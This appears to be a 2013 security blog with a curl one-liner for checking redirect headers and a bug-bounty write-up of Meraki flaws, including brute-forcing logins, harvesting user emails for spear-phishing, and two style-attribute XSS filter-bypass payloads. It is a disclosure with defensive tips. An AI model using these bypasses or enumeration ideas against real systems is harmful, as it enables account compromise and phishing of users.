Thursday, 30 May 2013

A Curl One-Liner to Retrieve Headers or Response Data

In this post I'll cover a simple curl one-liner that will let you read response content from multiple sites. I had a list of URLs and for each URL I wanted to check if the site redirected the user to another page via the location header. As usual a magic one liner came to the rescue!


Retrieving our data

First up I needed a way to send a request and receive a response from the remote server. Wget and Curl are both great options. I went with curl. Because of the company proxy I needed to include the --proxy flag.

curl -i -s --proxy http://myproxy.com:8080 www.google.com|grep Location:

  • By default Curl doesn't include the response headers, to actually see them you need to use the -i flag. 
  • Curl often displayed download messages I didn't want to see so I included the silent (-s) flag. 
  • As I was just looking for redirections I added a bit of grep on the end to show just the Location header.


For Loopin'

As I wanted to grab the header from multiple sites I needed to perform the Curl within a for loop.

for i in $(cat hosts.txt);do curl -i -s --proxy http://myproxy.com:8080 http://www.$i|grep Location:;done;

Here I read in the hostnames from hosts.txt and for each host download the content and search for the Location header. My hosts were in the format "test.com", so I included the http://www. in front of the $i.


Sorting Output

Using the above one-liner you get the grep output and nothing else. I wanted to know which site had which header. To do this I assigned the curl output to a variable and then performed a check with double brackets to see if the variable was empty (whether the site had the header or not). And finally outputted the results.

for i in $(cat hosts.txt);do data=$(curl -i -s --proxy http://myproxy.com:8080 http://www.$i|grep Location:);if [[$data]];then echo $i $data;fi;done;

My final output looked like this:


You can see Google will redirect me to the local version (.com.ph) and Paypal/Facebook redirect to the https version of the site.


Final Thoughts

I love a good one-liner and this simple script can easily be altered for different headers or data depending on what you're looking for.

If you're just interested in the headers it's also worth checking out the curl special variables as described here:
http://beerpla.net/2010/06/10/how-to-display-just-the-http-response-code-in-cli-curl/

Hope you guys have found this useful. Improvements and comments always welcome!


Cheers, 

PwnDizzle out.

Saturday, 11 May 2013

On the Meraki Bounty Trail


Back in March Meraki started a bounty program. I ended up digging around the site in April so missed all the easy XSS but still came across a few interesting bits and bobs.

Today I'll talk about six issues that caught my attention, starting with the mediocre leading up to the slightly more interesting.


#1 Missing HTTPS

No SSL on the tools login page meant any attacker could sniff your credentials right out of the air, who knows maybe even when you're using your own Meraki wifi.



#2 Sensitive File Disclosure on Partner Site

It's always amazing what Google can uncover. In the case of Meraki it turned out that a number of potentially sensitive files for partners/resellers were (still are?) accessible through Google. Want to know how much a Meraki AP really costs and what cut your Meraki reseller is taking? Easy just Google for it!


Needless to say these kinds of files shouldn't be publicly accessible.



#3 Lack of Brute Force Mitigation

Anyone was free to guess user passwords an unlimited number of times without experiencing any kind of lockout or captcha. In the screenshot you can see on my 123rd attempt i guessed the correct password (meraki123) and received a 302 indicating a successful login.


It was quite funny that when I (and presumably other people) reported this to Meraki, they replied that they didn't regard this as an issue that needed fixing! I know, it's hard to believe. Luckily they had second thoughts and a few days later had implemented a captcha check on five failed logins.


#4 Information disclosure when adding device

When playing around with my test account I found I couldn't test all the features as I didn't actually have a Meraki wireless access point. Looking over the "Add Access Point" form I was thinking I could maybe brute force the serial/order number field.


The problem was I didn't know the length or structure of the numbers. So I thought why not Google it? Again Google to the rescue and after a little searching I found a blog post that actually contained device serial numbers!

Inserting these numbers I received an error message that the access point was already in use. Interestingly though the error message contained the email address of the user who had registered the access point! Say wut?!


So now we can target that user with some clever meraki-based spear-phishing, compromise their account and then go on to potentially compromise all of their wifi users! Nice.

And now for the catch....a twelve character serial containing letters and numbers (12^36) isn't remotely bruteforceable. Even if Meraki produced a few million devices its still going to take a long long time to guess valid serials. So it's low risk?

Well the other possible attack vector here would be the order number, if Meraki are using sequential order numbers you could potentially dump the email address of every user. Sweet! :)


#5 Splash Page Javascript Inclusion

Meraki allows you to define a splash page, which is a page that users will be shown when they first connect to your wifi. To create your page they provide a HTML editor but prevent the inclusion of sensitive HTML, e.g. script, iframe, embed, event handlers etc.

After a little playing around I found they had missed style attribute filtering, allowing Javascript inclusion.

<img style="xss:expression(alert('LOL'))">
Or:
<style type="text/css">BODY{background:url("javascript:alert('LOL')")}</style>



For any determined bounty hunters out there, I would definitely recommend taking a look at the editor as I'm sure there are more holes in it :)


#6 Mobile Site XSS

The final issue was in the mobile site. Burp flagged this up as XSS and on closer inspection it turned out to be a json callback parameter being echo'ed back unencoded (allowing us to insert <script> etc.).



However in Chrome and Firefox this was not actually exploitable as they correctly enforce the json content-type sent from the server meaning the Javascript isn't rendered by the browser.


After a little digging I found the following:

https://superevr.com/blog/2012/exploiting-xss-in-ajax-web-applications/

I never knew if you renamed the file extension IE would ignore the content-type sent by the server. So by adding a .html to the url IE would render the page as HTML, which meant XSS!

Annoyingly, it turns out the IE XSS filter doesn't take any prisoners. After a lot of playing around I just couldn't evade the filter and Microsoft appear to have fixed the same domain trick mentioned in the the post below:

http://nomoreroot.blogspot.co.uk/2008/08/ie8-xss-filter.html

So the XSS was dead in the water (at least in IE8/9/10). Microsoft got something right!



Final Thoughts

Rather simplistic information disclosure/account security issues can seem trivial but under the right circumstances they can cause serious damage. And the funny thing is that these are the issues vulnerability scanners will often miss.

Today's security tips:
  • Always use SSL
  • Make sure your directory permissions are correct
  • Always use brute force mitigation
  • Don't disclose user information in error messages
  • Don't allow users to insert HTML
  • Always html encode user input when outputting it on your page

Questions, comments, corrections and IE XSS filter bypasses are always welcome :)